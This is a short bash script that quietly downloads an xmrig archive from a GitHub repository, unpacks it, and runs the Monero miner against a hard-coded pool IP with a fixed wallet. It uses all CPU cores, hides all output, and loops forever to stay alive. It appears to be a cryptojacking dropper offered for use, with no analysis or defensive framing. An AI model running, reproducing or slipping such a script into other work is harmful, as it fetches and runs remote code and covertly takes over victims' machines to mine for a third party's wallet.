#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz >/dev/null 2>&1
tar -xvf xmrig.tar.gz
./xmrig --url 68.183.179.213:443 --user 89LTdPHYx42YhLfH6yzufYbwGzgFLRx59SG1xcmhxx1zaSdWUBMBMkkSRy1mUMPyDQUi98y5Ufxq8aY4znchEai3MdEj217 --pass $(shuf -n 1 -i 1-99999)-AMD --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14 -t $(nproc --all) >/dev/null 2>&1
while [ 1 ]; do
sleep 3
done
